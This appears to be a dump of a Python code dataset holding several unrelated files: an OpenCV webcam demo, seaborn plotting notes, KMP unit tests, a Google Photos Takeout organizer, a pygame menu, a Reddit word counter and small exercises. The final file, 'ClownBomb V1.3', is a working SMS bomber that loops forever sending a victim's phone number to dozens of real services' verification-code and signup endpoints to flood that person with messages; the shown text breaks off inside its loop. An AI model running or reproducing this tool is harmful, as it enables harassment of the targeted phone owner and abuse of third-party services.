blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
f1405eb730a5ff797a58c5d1fd26daf52c564666 | Python | duypham9895/python-cv2-basic | /Chapter_1.py | UTF-8 | 642 | 3.15625 | 3 | [] | no_license | # Read (Image - Video - Webcam)
import cv2
print("Package imported")
# Read image
# img = cv2.imread("Resources/image-1.jpg")
# cv2.imshow("Output 0: ", img)
# cv2.waitKey(0)
# Read video
# cap = cv2.VideoCapture("Resources/cafe.mp4")
# while True:
# success, img = cap.read()
# cv2.imshow("Video", img)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# Read camera
cap = cv2.VideoCapture(0)
# set width
cap.set(3, 640)
# set height
cap.set(4, 480)
# set brightness
cap.set(10, -100000)
while True:
success, img = cap.read()
cv2.imshow("Video", img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break | true |
6f240e69a0560b8ab8c21de126921145d7176f61 | Python | TheoLoza/the-sandbox | /ds-python-utd/notes/18_CategoricalPlots.py | UTF-8 | 959 | 2.953125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
tips = sns.load_dataset('tips')
df = pd.DataFrame(tips)
# print(df)
df2 = df[df['day'] == 'Thur']
# print(df2)
#df2.to_csv('Tips_Thurs.csv', index=False)
# group by action
# aggregate categorical data by some function default mean
# estimator: aggregate function
#sns.barplot(x='sex', y='total_bill', data=tips)
# plt.show()
#sns.barplot(x='sex', y='total_bill', data=tips, estimator=np.std)
# plt.show()
# y-axis is already chosen for us
#sns.countplot(x='sex', data=tips)
# plt.show()
#sns.countplot(x='sex', data=tips, hue='smoker')
# plt.show()
sns.boxplot(x="day", y="total_bill", data=tips, palette='rainbow')
plt.show()
#sns.boxplot(x="day", y="total_bill", hue="smoker", data=tips, palette="coolwarm")
# plt.show()
#sns.violinplot(x="day", y="total_bill", data=tips, palette='rainbow')
# plt.show()
#Ref: www.pieriandata.com
| true |
a1b6bfdcbbdb6c48fdf0dd9a9b956bfc7e992732 | Python | Arshad520786/28.-Implement-strStr | /KMPunittest.py | UTF-8 | 1,132 | 3.109375 | 3 | [] | no_license | import unittest
from KMPalgorithm import Solution
class RemoveDuplicatesfromSortedArrayTest(unittest.TestCase):
def test_basic_function(self):
temp = Solution()
self.needle = "abcdefg"
self.assertEqual(temp.FailureFunction(self.needle),
[0, 0, 0, 0, 0, 0, 0])
def test_basic_function2(self):
temp = Solution()
self.needle = "abcabc"
self.assertEqual(temp.FailureFunction(
self.needle), [0, 0, 0, 1, 2, 3])
def test_basic_function3(self):
temp = Solution()
self.needle = "abababac"
self.assertEqual(temp.FailureFunction(
self.needle), [0, 0, 1, 2, 3, 4, 5, 0])
def test_basic_function4(self):
temp = Solution()
self.needle = "AABAACAABAA"
self.assertEqual(temp.FailureFunction(
self.needle), [0, 1, 0, 1, 2, 0, 1, 2, 3, 4, 5])
def test_basic_issip(self):
temp = Solution()
self.needle = "issip"
self.assertEqual(temp.FailureFunction(
self.needle), [0, 0, 0, 1, 0])
if __name__ == "__main__":
unittest.main()
| true |
ecaca06e02874cc0fb168ff441c950b11a1c3b73 | Python | pollyhsia/pythonDataScience_hw | /HW2_class4_functionForSd.py | UTF-8 | 297 | 3.1875 | 3 | [] | no_license | import statistics
import math
def my_sd_function(ls):
sq = 0
for i in ls:
sq += (i - statistics.mean((ls)))**2
div = math.sqrt(sq/(len(ls)-1))
return div
my_list = [1,2,3]
my_list2 = range(1,11)
my_list3 = range(1,101)
print(my_sd_function(my_list3))
| true |
bdb04d6b230bcc4fcd28a3256145ddc335e90bb6 | Python | kevinfang418/sc-projects | /SC101_Assignment1/draw_line.py | UTF-8 | 1,479 | 3.8125 | 4 | [
"MIT"
] | permissive | """
File: draw_line.py
Name: Kevin Fang
-------------------------
TODO:
"""
from campy.graphics.gobjects import GOval, GLine
from campy.graphics.gwindow import GWindow
from campy.gui.events.mouse import onmouseclicked
# Assign window as constant to create canvas
window = GWindow()
SIZE = 10
# a, b ,c ,d are global variables, so define them as 0 value
a = b = c = d = 0
def main():
"""
This program creates lines on an instance of GWindow class.
There is a circle indicating the user’s first click. A line appears
at the condition where the circle disappears as the user clicks
on the canvas for the second time.
"""
onmouseclicked(set_point)
def set_point(event):
# a and b are global variables to store mouse event when everytime mouse clicked
global a, b, c, d
a = event.x
b = event.y
# check c and d are circle (object)
maybe_circle = window.get_object_at(c, d)
# draw circle when c and d are (0, 0)
if c == d == 0:
point = GOval(SIZE, SIZE, x=a-SIZE/2, y=b-SIZE/2)
point.filled = False
window.add(point)
c = a
d = b
# if (c, d) is circle and not (0, 0), we need to draw a line from (c, d) to (a, b)
elif maybe_circle is not None and c != d != 0:
line = GLine(c, d, a, b)
window.add(line)
window.remove(maybe_circle)
c = 0
d = 0
if __name__ == "__main__":
main()
| true |
79ef7eb2a1fbf4183c1ec42490b720dfc1feb256 | Python | basantpatidar/pythonBasics | /helloWorld.py | UTF-8 | 469 | 3.765625 | 4 | [] | no_license | print('Hello World!')
print(5 + 6)
print(7*2)
print()
print('End')
print("It's easy")
print("Hello 'Basant'")
print("Hello" + "Patidar")
Greetings = "Hello"
Name = "Basant"
#line prints Name and Greeting
print(Greetings + Name)
print(Greetings +" "+ Name)
school = input('Enter you school name ')
print(Name +"'s school's name is "+school)
spliteString = "String is splited\n in namy \n parts"
print(spliteString)
tabFunction = "1\t2\t3\t4\tBasant"
print (tabFunction)
| true |
6b426d6d9dd5918a57df2e247d68142742bd338f | Python | Pochemu/Activity | /Щелчок/8795106/6.py | UTF-8 | 58 | 2.78125 | 3 | [] | no_license | s = 0
k = 0
while k < 30:
k += 3
s += k
print(s)
| true |
f15038bc0bd4497509cb98e8ffb541d56b58a980 | Python | HillYang/PythonExercises | /VSCodeProjects/HelloVSCode/二 算法分析/dict_list_compare.py | UTF-8 | 382 | 2.671875 | 3 | [] | no_license | import timeit
import random
print("Number list_time dict_time")
for i in range (10000,100001,10000):
time = timeit.Timer("random.randrange(%d) in x" %i, "from __main__ import random, x")
x = list(range(i))
list_time = time.timeit(number=1000)
x = {j:None for j in range(i)}
dict_time = time.timeit(number=1000)
print("%d %f %f" % (i, list_time, dict_time)) | true |
d9c89f230afd3e6b9415787c114ee3c96f92be0d | Python | phrodrigue/URI-problems | /iniciante/2139/main.py | UTF-8 | 394 | 3.53125 | 4 | [] | no_license | meses = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 25]
while True:
try:
m, d = [int(x) for x in input().split()]
m -= 1
except EOFError:
break
dias = (meses[m] - d) + sum(meses[m + 1:])
if dias < 0:
print("Ja passou!")
elif dias == 0:
print("E natal!")
elif dias ==1:
print("E vespera de natal!")
else:
print(f"Faltam {dias} dias para o natal!")
| true |
a47b2096a818b0d55b7e797182de87582654b6ee | Python | CarlosCruzy/literate-enigma | /eceptions.py | UTF-8 | 130 | 3.0625 | 3 | [] | no_license | try:
a=int(input("Ingrese una edad"))
except:
print("Ingrese un valor valido")
finally:
print("adios")
exit() | true |
a4ff93510f6a261ea2b2a8e2acd1411b3e505599 | Python | atlantageek/HelpingSantasHelpers | /SantasHelperSolutionDynamicProgramming.py | UTF-8 | 539 | 2.78125 | 3 | [] | no_license | import sys
import random
from SantasHelperSolution import *
class SantasHelperSolutionDynamicProgramming(SantasHelperSolution):
def run(self):
while len(self.toys) > 0:
start_time, elf = self.next_available_elf()
toy = self.toys.pop(random.randint(0, len(self.toys) - 1))
self.record_work(elf, toy)
input_file = sys.argv[1]
output_file = sys.argv[2]
num_elves = int(sys.argv[3])
solution = SantasHelperSolutionDynamicProgramming(input_file, output_file, num_elves)
solution.process()
| true |
63cc023fdc4b96ae1cf61b513f230e8ac0f9481b | Python | AnaRitaTorres/RVAU | /Proj2-MapasAumentados/src/core/database.py | UTF-8 | 6,429 | 3 | 3 | [] | no_license | import pickle
import os.path
import shutil
from core.utils import *
from core.detector import *
database_name = 'maps.db'
points_path = 'POIs\\'
# Represents a Point of Interest. Initialize with point coordinates (x and y), name given by user and array of images
class PointOfInterest:
def __init__(self, position_x, position_y, name, images):
self.position_x = position_x
self.position_y = position_y
self.name = name
self.images = images
# Represents an Image. Initialize with filename, features and points of interest as arguments
class Image:
def __init__(self, filename, features, points):
self.filename = filename
self.features = features
self.points = points
# Represents a Map. Initialize with name of the entry, map scale and filename of the frontal image
# Also associated to a set of one or more images
class MapEntry:
def __init__(self, name, scale, frontal_image, images):
self.name = name
self.scale = scale
self.frontal_image = frontal_image
self.images = images
# Returns a list with the names of the maps currently stored in database
def get_map_names(maps):
map_names = []
for map_entry in maps:
map_names.append(map_entry.name)
return map_names
# Returns map information from the database given a map name and a set of maps
def get_map(map_name, maps):
for map_entry in maps:
if map_name == map_entry.name:
return map_entry
return None
# Get base image information
def get_base_image(map_entry):
filename = map_entry.frontal_image
for image in map_entry.images:
if image.filename == filename:
return image
# Loads database if it exists and prints their contents
def load_database(test):
empty_map = []
# Check if database exists
if not os.path.isfile(database_name):
if test:
print("\nDatabase doesn't yet exist.\n")
return empty_map
infile = open(database_name, 'rb')
maps = pickle.load(infile)
infile.close()
if test and maps:
print("\nSuccessfully loaded database!\n")
'''
for map_entry in maps:
print('\nMap name:', map_entry.name)
print('\nMap scale:', map_entry.scale)
print('\nFrontal image of map:', map_entry.frontal_image)
for img in map_entry.images:
print('\nImage name:', img.filename)
features = deserialize_features(img.features)
print('Deserialized features:', len(features['k']), len(features['d']), 'points')
for poi in img.points:
print('Point of Interest:', poi.position_x, poi.position_y, poi.name, poi.images)
print('\n')
'''
return maps
# Check if database exists and update its contents if it exists
def update_database(entry_name, map_scale, filename, images, test):
# List of maps to be added to the database
maps = []
# Creates current map entry
map_entry = MapEntry(entry_name, map_scale, filename, images)
# Check if database exists
if os.path.isfile(database_name):
# Read database contents
infile = open(database_name, 'rb')
maps_loaded = pickle.load(infile)
# Boolean used to check if map already exists on the database
map_exists = False
# Iterate over maps already on the database
for i in range(len(maps_loaded)):
# Checks if there is an map in database equal to current one
if maps_loaded[i].name == entry_name:
if test:
print("Found equal map on the database. Will update its contents")
# Equal map exists
map_exists = True
# Update images of map found on the database
maps_loaded[i].images = images
# Checks after iterating over maps if current map doesn't exist in database
if not map_exists:
if test:
print("Added map entry to database")
maps_loaded.append(map_entry)
# Get updated map
maps = maps_loaded
else:
if test:
print("Added map entry to database")
# If database doesn't exist, just append map entry
maps.append(map_entry)
return maps
# Saves map to database
def save_database(entry_name, map_scale, filename, more_images, features, pois, test):
# Get points with new file paths
points = setup_pois(pois, test)
images = []
if test:
print('Saving map', entry_name, 'to database...')
for img_filename in more_images:
if test:
print("Detecting features on additional images of the map.")
# Run SIFT on map image
results = runSIFT(img_filename, test)
new_image = Image(img_filename, results['pts_features'], [])
images.append(new_image)
# Create image object
image = Image(filename, features, points)
images.append(image)
maps = update_database(entry_name, map_scale, filename, images, test)
# Save images to database
binary_file = open(database_name, mode='wb')
pickle.dump(maps, binary_file)
binary_file.close()
# Copies each POI's images to the appropriate folder, then returns all POIs
def setup_pois(pois, test):
# Creates POIs directory
if not os.path.exists(points_path):
os.makedirs(points_path)
# Iterate over points of interest and get their new paths
new_points = []
for poi in pois:
new_points.append(copy_images(poi, test))
if test:
print('Copied all POI images to new folder')
# Return updated points of interest
return new_points
# Parses images from a PointOfInterest object and copies them to a new folder
def copy_images(poi, test):
# Get images attached to Point of Interest
poi_images = poi.images
# Iterate over images, copy them to new folder and get their path
new_images = []
for img in poi_images:
new_images.append(copy_file(img, test))
# Update image paths in Point of Interest object
poi.images = new_images
return poi
# Copy image to Points of Interests folder
def copy_file(filename, test):
img = filename
try:
img = shutil.copy(filename, points_path)
except shutil.SameFileError:
if test:
print("Image already exists in POIs folder")
return img
| true |
6271bc990d812d792110c4759335693f0c422516 | Python | hexdump/takeout-google-photos-export | /photos.py | UTF-8 | 9,051 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env python3
#
# [photos.py]
#
# Google Photos Takeout organization tool.
# Copyright (C) 2020, Liam Schumm
#
# for command-line interface
import click
# for handling filesystem paths
from pathlib import Path
# for image conversion and hashing
from PIL import Image as PILImage
# for detecting what is and isn't a photo
from PIL import UnidentifiedImageError
# so we can dispatch to exiftool for
# TIFF manipulation
from subprocess import check_call, PIPE, CalledProcessError, DEVNULL
# so we can manipulate created/modified times
# for importing
from os import utime
# for hashing files
from hashlib import sha256
# for parsing Google's non-standard "formatted" timestamps
from dateutil.parser import parse as parse_date
from json import loads as parse_json
# for handling HEIC files
from pyheif import read as read_heic
# for exiting on error
from sys import exit
# for a progress bar
from tqdm import tqdm
# to copy files
from shutil import copy
LOG = ""
def log(message):
global LOG
LOG += message + "\n"
class Timestamp:
def __init__(self, taken, created, modified):
self.taken = parse_date(taken)
self.created = parse_date(created)
self.modified = parse_date(modified)
def __eq__(self, other):
if isinstance(other, Timestamp):
if ((self.taken == other.taken)
and (self.created == other.created)
and (self.modified == other.modified)):
return True
return False
class Location:
def __init__(self, latitude, longitude, altitude):
self.latitude = latitude
self.longitude = longitude
self.altitude = altitude
def __eq__(self, other):
if isinstance(other, Location):
if ((self.latitude == other.latitude)
and (self.longitude == other.longitude)
and (self.altitude == other.altitude)):
return True
return False
def is_zero(self):
return (self.latitude == 0) and (self.longitude == 0) and (self.altitude == 0)
class Metadatum:
def __init__(self, path):
self.path = path
with open(path, "r") as f:
self._data = parse_json(f.read())
try:
self.title = self._data["title"]
self.timestamp = Timestamp(self._data["photoTakenTime"]["formatted"],
self._data["creationTime"]["formatted"],
self._data["modificationTime"]["formatted"])
self.location = Location(self._data["geoDataExif"]["latitude"],
self._data["geoDataExif"]["longitude"],
self._data["geoDataExif"]["altitude"])
except KeyError:
raise ValueError(f"warning: insufficient metadata in JSON file {path}. ignoring...")
class Media:
def __init__(self, path):
self.path = path
self.title = self.path.name
with open(self.path, "rb") as f:
sha = sha256()
sha.update(f.read())
self.shasum = sha.hexdigest()
self.target_filename = self.shasum + self.path.suffix
self.timestamp = None
self.location = None
def is_metadata_complete(self):
return (self.timestamp is not None) and (self.location is not None)
def apply_exif(self, path):
if self.is_metadata_complete():
# add our metadata
try:
command = ["exiftool", path, "-overwrite_original",
f"-DateTimeOriginal={self.timestamp.taken}",
f"-CreateDate={self.timestamp.created}",
f"-ModifyDate={self.timestamp.modified}"]
if not self.location.is_zero():
command += [f"-GPSLatitude {self.location.latitude}",
f"-GPSLongitude {self.location.longitude}",
f"-GPSAltitude {self.location.altitude}"]
check_call(command, stdout=DEVNULL, stderr=DEVNULL)
utime(path, (self.timestamp.created.timestamp(),
self.timestamp.modified.timestamp()))
except CalledProcessError as e:
print(e)
log(f"error! could not set metadata on {path}!")
exit(1)
else:
raise ValueError("metadata incomplete.")
def save(self, target_directory):
target_path = target_directory.joinpath(self.target_filename)
if target_path.exists():
log(f"warning: duplicate version of {self.path} detected! ignoring...")
else:
copy(self.path, target_path)
class Video(Media):
def save(self, target_directory):
if self.is_metadata_complete():
target_path = target_directory.joinpath(self.target_filename).with_suffix(".mov")
if self.path.suffix.lower() == ".mp4":
# do a container transfer with no actual conversion.
try:
check_call(["ffmpeg", "-i", self.path, "-c", "copy",
"-f", "mov", target_path, "-y"],
stdout=DEVNULL, stderr=DEVNULL)
# later, we're gonna copy the file at self.path to
# self.target_path, so this assignment nullifies that
# operation (since we don't want the original, non-MOV).
self.path = target_path
except CalledProcessError as e:
print(e)
print(f"error! could not transfer container for {self.path}!")
exit(1)
# we shouldn't be allowing this to be initialized
# with something that isn't caught by now.
assert self.path.suffix.lower() == ".mov"
# copy the file over to the new location
if self.path != target_path:
copy(self.path, target_path)
# with open(target_path, "wb") as destination:
# with open(self.path, "rb") as source:
# destination.write(source.read())
# set the metadata.
self.apply_exif(target_path)
class Image(Media):
def save(self, target_directory):
print(self.path)
if self.path.suffix.lower() == ".heic":
heic = read_heic(self.path)
source = PILImage.frombytes(
heic.mode,
heic.size,
heic.data,
"raw",
heic.mode,
heic.stride,
)
else:
source = PILImage.open(self.path, "r")
target_path = target_directory.joinpath(self.shasum + '.tiff')
if target_path.exists():
log(f"warning: duplicate version of {self.path} detected! ignoring...")
else:
if self.is_metadata_complete():
source.save(target_path, format='TIFF', quality=100)
self.apply_exif(target_path)
@click.command()
@click.option("-t", "--takeout-directory", type=Path, required=True, help="Google Takeout directory.")
@click.option("-o", "--output-directory", type=Path, required=True, help="Directory in which to put imported files.")
def main(takeout_directory, output_directory):
metadata = []
media = []
for filename in takeout_directory.rglob("*"):
# blindly suck in all JSON files.
if filename.name.endswith('.json'):
try:
metadata.append(Metadatum(filename))
continue
except ValueError:
pass
if filename.suffix.lower() == ".heic":
media.append(Image(filename))
# let's see if we can load it as an image file.
# if we can, load it into the images list.
try:
if filename.suffix.lower() != ".heic":
PILImage.open(filename)
media.append(Image(filename))
continue
except UnidentifiedImageError:
pass
# i don't have support for all video file formats, so we
# just check if the file is in the supported list.
if filename.suffix.lower() in ['.mp4', '.mov']:
media.append(Video(filename))
# unify metadata and images
with tqdm(media) as iterator:
for item in iterator:
matched = False
for metadatum in metadata:
if item.title == metadatum.title:
item.timestamp = metadatum.timestamp
item.location = metadatum.location
item.save(output_directory)
matched = True
if not matched:
copy(item.path, "spare")
log(item.title + " not saved.")
# print our accumulated log
print(LOG)
if __name__ == "__main__":
main()
| true |
dbdc0f29bd7a6c8f1f9a80e871e9abb447857568 | Python | Joe2357/Baekjoon | /Python/Code/2900/2908 - 상수.py | UTF-8 | 209 | 3.453125 | 3 | [] | no_license | a, b = input().split()
for i in range(2, -1, -1):
if a[i] > b[i]:
for j in range(2, -1, -1):
print(a[j], end = "")
break
elif a[i] < b[i]:
for j in range(2, -1, -1):
print(b[j], end = "")
break | true |
de3e72f486c4b6a783634ab638e5d1a4119e2aa8 | Python | fuboki10/Tower-Defense-Game | /main_menu/main_menu.py | UTF-8 | 1,831 | 3.171875 | 3 | [
"MIT"
] | permissive | import pygame
import os
from game import Game
logo = pygame.image.load(os.path.join("assets", "logo.png"))
start_button = pygame.image.load(os.path.join("assets/menu", "StartButton.png"))
class MainMenu:
def __init__(self, window, width: int, height: int):
"""
:param window: surface
:param width: int
:param height: int
"""
self.width = width
self.height = height
self.bg = pygame.image.load(os.path.join("assets", "lvl1.jpg"))
self.bg = pygame.transform.scale(self.bg, (self.width, self.height))
self.window = window
self.button = (self.width/2 - start_button.get_width()/2, 350, start_button.get_width(), start_button.get_height())
self.running = False
def run(self):
"""
Open Main Menu
:return: None
"""
self.running = True
clock = pygame.time.Clock()
while self.running:
clock.tick(60)
self.draw()
self.input()
pygame.quit()
def draw(self):
self.window.blit(self.bg, (0, 0))
self.window.blit(logo, (self.width/2 - logo.get_width()/2, 0))
self.window.blit(start_button, (self.button[0], self.button[1]))
pygame.display.update()
def input(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = pygame.mouse.get_pos()
if self.button[0] <= x <= self.button[0] + self.button[2]:
if self.button[1] <= y <= self.button[1] + self.button[3]:
game = Game(self.window, self.width, self.height)
self.running = game.run()
del game
| true |
69cd412c9dab79279a6ad7cc0264b0e6e7d5b1b1 | Python | vincent507cpu/Comprehensive-Algorithm-Solution | /LintCode/ladder 02 two pointers/选修/609. Two Sum - Less than or equal to target/solution.py | UTF-8 | 556 | 3.21875 | 3 | [
"MIT"
] | permissive | class Solution:
"""
@param nums: an array of integer
@param target: an integer
@return: an integer
"""
def twoSum5(self, nums, target):
# write your code here
if len(nums) < 2:
return 0
nums.sort()
left, right, res = 0, len(nums) - 1, 0
while left < right:
if nums[left] + nums[right] > target:
right -= 1
else:
res += right - left
left += 1
return res | true |
05006a034f02284a6dfd419aac39faf896f7f100 | Python | Pamex1/ALx-system_engineering-devops-2 | /0x16-api_advanced/100-count.py | UTF-8 | 2,708 | 3.0625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python3
"""script for parsing web data from an api
DISCLAIMER: THIS PROBABLY SHOULDN'T BE DONE RECURSIVELY
but we had to for school :P
"""
import json
import requests
import sys
def get_hot_posts(subreddit, hot_list=[]):
"""api call to reddit to get the number of subscribers
"""
base_url = 'https://www.reddit.com/r/{}/top.json'.format(
subreddit
)
headers = {
'User-Agent':
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) \
Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)'
}
if len(hot_list) == 0:
# grab initial list
url = base_url
else:
# grab next pagination after last obj in hot_list
url = base_url + '?after={}_{}'.format(
hot_list[-1].get('kind'),
hot_list[-1].get('data').get('id')
)
response = requests.get(url, headers=headers)
resp = json.loads(response.text)
try:
data = resp.get('data')
children = data.get('children')
except:
return None
if children is None or data is None or len(children) < 1:
return hot_list
hot_list.extend(children)
return get_hot_posts(subreddit, hot_list)
def count_words(subreddit, wordlist):
"""count words in titles of hot posts for subreddit
"""
posts = get_hot_posts(subreddit)
if posts is None:
print(end="")
return
words = gather_word_info(posts, wordlist)
sorted_list = [(key, val) for key, val in words.items()]
sorted_list = sorted(sorted_list, key=lambda tup: tup[1], reverse=True)
[print("{}: {}".format(key, val)) for (key, val) in sorted_list if val > 0]
def gather_word_info(hot_posts, wordlist,
posts_len=None,
counter=0,
words_info=None):
"""does the recursion to grab word info from wordlist and posts
"""
if hot_posts is None:
return
# generate defaults
if posts_len is None:
posts_len = len(hot_posts)
if words_info is None:
words_info = {key: 0 for key in wordlist}
# base case
if counter == posts_len - 1:
return words_info
# parse this title and move to next
data = hot_posts[counter].get('data')
if data is None:
return words_info
title = data.get('title')
if title is None:
return words_info
# im sorry im not doing recursion for text parsing that's rediculous
for word in title.split(' '):
word = word.lower()
if word in wordlist:
words_info[word] += 1
counter += 1
return gather_word_info(
hot_posts, wordlist, posts_len,
counter, words_info
)
| true |
c1637a8af6c85ffc8fe58fd1bc06b34a23b384e5 | Python | layoaster/compython | /p7/idclass.py | UTF-8 | 1,464 | 3.015625 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
$Id$
Description: Representacion de los Simbolos No Terminales.
$Author$ Lionel Aster Mena Garcia, Alejandro Samarin Perez, Sergio Armas Perez
$Date$
$Revision$
"""
class WrapCl:
ARRAY_TYPE = 0
CONSTANT = 1
FIELD = 2
PROCEDURE = 3
RECORD_TYPE = 4
STANDARD_PROC = 5
STANDARD_TYPE = 6
VALUE_PARAMETER = 7
VAR_PARAMETER = 8
VARIABLE = 9
UNDEFINED = 10
class IdClass:
def __init__(self, cl = None):
""" Constructor de la clase
_name = nombre de la clase del identificador
"""
self._name = cl
def setName(self, cl):
""" Setter del nombre de la clase del identificador
"""
self._name = cl
def getName(self):
""" Getter del nombre de la clase del identificador
"""
return self._name
def __eq__(self, nt):
""" Sobrecarga del operador de comparacion "igual que", para establecer las comparaciones
entre objetos Class tambien necesaria para utilizarlo como clave en los diccionarios
"""
if self._name == cl.getName():
return True
else:
return False
def __hash__ (self):
""" Sobrecarga de la funcion hash (identificando el objeto NoTerm de manera unica) necesaria para utilizarlo
como clave en los diccionarios
"""
return hash(self._name)
| true |
6adff17d73394254aec911b4b0ffb4b510ed1af8 | Python | chettayyuvanika/Questions | /Easy/Second_Smallest.py | UTF-8 | 1,338 | 3.703125 | 4 | [] | no_license | # Problem Name is &&& Second Smallest &&& PLEASE DO NOT REMOVE THIS LINE.
"""
Instructions to candidate.
1) Run this code in the REPL to observe its behaviour. The execution entry point is main().
2) Consider adding some additional tests in doTestsPass().
3) Implement secondSmallest() correctly.
4) If time permits, some possible follow-ups.
"""
def secondSmallest(x):
""" Returns second smallest element in the array x. Returns nothing if array has less than 2 elements. """
# todo: implement here return
if len(x)<2:
return
else:
minf,mins=x[0],x[1]
if x[0]>x[1]:
mins=x[0]
minf=x[1]
for i in range(2,len(x)):
if(x[i]<minf):
mins=minf
minf=x[i]
elif x[i]<mins:
mins=x[i]
return mins
def doTestsPass():
""" Returns 1 if all tests pass. Otherwise returns 0. """
testArrays = [ [0], [0,1] ,[1,1,7,6,3,5,8]]
testAnswers = [ None, 1,1]
for i in range( len( testArrays ) ):
if not ( secondSmallest( testArrays[i] ) == testAnswers[i] ):
return False
return True
if __name__ == "__main__":
if( doTestsPass() ):
print( "All tests pass" )
else:
print( "Not all tests pass" ) | true |
38c5f2ca401a10f24c94fd39f410134783413448 | Python | clownGUI/ClownBombV1.3 | /V1.3.py | UTF-8 | 30,067 | 2.515625 | 3 | [] | no_license | #!/usr/bin/python3
# Spammer
# Author: milkpro
import random, time, os
from time import sleep
try: import requests
except: os.system("pip install requests")
print ( "connections..." )
sleep ( 4 )
def main():
os.system('cls' if os.name=='nt' else 'clear')
logo = """\033[32m\n\033[32m
▒█▀▀█ █░░ █▀▀█ █░░░█ █▀▀▄ █▀▀▄ █▀▀█ █▀▄▀█ █▀▀▄
▒█░░░ █░░ █░░█ █▄█▄█ █░░█ █▀▀▄ █░░█ █░▀░█ █▀▀▄
▒█▄▄█ ▀▀▀ ▀▀▀▀ ░▀░▀░ ▀░░▀ ▀▀▀░ ▀▀▀▀ ▀░░░▀ ▀▀▀░
▒█░░▒█ ▄█░ ░ █▀▀█
░▒█▒█░ ░█░ ▄ ░░▀▄
░░▀▄▀░ ▄█▄ █ █▄▄█ By ClownDetecter\n\033[0m"""
_phone = input(logo+"\033[34m number>> \033[0m")
if len(_phone) == 11 or len(_phone) == 12 or len(_phone) == 13:
pass
else:
print("\n\033[31m[!] Неправильный номер.\033[0m")
time.sleep(2)
main()
if _phone[0] == "+":
_phone = _phone[1:]
if _phone[0] == "8":
_phone = "7"+_phone[1:]
if _phone[0] == "9":
_phone = "7"+_phone
if _phone == "79151825692":
print("\n\033[31m ^\nSyntaxError: invalid syntax\033[0m")
time.sleep(2)
main()
_name = ""
russian_name = ""
for x in range(12):
_name = _name + random.choice(list("123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"))
password = _name + random.choice(list("123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"))
username = _name + random.choice(list("123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"))
russian_name = russian_name + random.choice(list("АаБбВвГгДдЕеЁёЖжЗзИиЙйКкЛлМмНнОоПпРрСсТтУуФфХхЦцЧчШшЩщЪъЫыЬьЭэЮюЯя"))
_phone9 = _phone[1:]
_phoneAresBank = "+"+ _phone[0]+"("+ _phone[1:4]+")"+ _phone[4:7]+"-"+ _phone[7:9]+"-"+ _phone[9:11]
_phone9dostavista = _phone9[:3]+"+"+ _phone9[3:6]+"-"+ _phone9[6:8]+"-"+ _phone9[8:10]
_phoneOstin = "+"+ _phone[0]+"+("+ _phone[1:4]+")"+ _phone[4:7]+"-"+ _phone[7:9]+"-"+ _phone[9:11]
_phonePizzahut = "+" + _phone[0]+" ("+ _phone[1:4]+") "+ _phone[4:7]+" "+ _phone[7:9]+" "+ _phone[9:11]
_phoneGorzdrav = _phone[1:4]+") "+ _phone[4:7]+"-"+ _phone[7:9]+"-"+ _phone[9:11]
iteration = 0
_email = _name+f"{iteration}"+"@gmail.com"
email = _email
os.system('cls' if os.name=='nt' else 'clear')
print(logo+"\033[37mТелефон: \033[34m"+_phone+"\n\033[37mСпамер запущен.\033[0m\n")
while True:
try:
try:
requests.post("https://moscow.rutaxi.ru/ajax_keycode.html", data={"l": _phone9}).json()["res"]
except:
pass
try:
requests.post("https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru", data={"phone_number": _phone}, headers={})
except:
pass
try:
requests.post("https://app.karusel.ru/api/v1/phone/", data={"phone": _phone}, headers={})
except:
pass
try:
requests.post("https://api.mtstv.ru/v1/users", json={"msisdn": _phone}, headers={})
except:
pass
try:
requests.post("https://youla.ru/web-api/auth/request_code", data={"phone": _phone})
except:
pass
try:
requests.post("https://www.citilink.ru/registration/confirm/phone/+" + _phone + "/")
except:
pass
try:
requests.get("https://findclone.ru/register", params={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": _phone})
except:
pass
try:
requests.post("https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://www.icq.com/smsreg/requestPhoneValidation.php", data={"msisdn": _phone, "locale": "en", "countryCode": "ru", "version": "1", "k": "ic1rtwz1s1Hj1O0r", "r": "46763"})
except:
pass
try:
requests.post("https://guru.taxi/api/v1/driver/session/verify", json={"phone": {"code": 1, "number": _phone}})
except:
pass
try:
requests.post("https://cloud.mail.ru/api/v2/notify/applink", json={"phone": "+" + _phone, "api": 2, "email": "email", "x-email": "x-email"})
except:
pass
try:
requests.post("https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone", data={"st.r.phone": "+" +_phone})
except:
pass
try:
requests.post("https://passport.twitch.tv/register?trusted_request=true", json={"birthday": {"day": 11, "month": 11, "year": 1999}, "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True, "password": password, "phone_number": _phone, "username": username})
except:
pass
try:
requests.post("https://www.instagram.com/accounts/account_recovery_send_ajax/", data={"email_or_username": _phone, "recaptcha_challenge_field":""})
except:
pass
try:
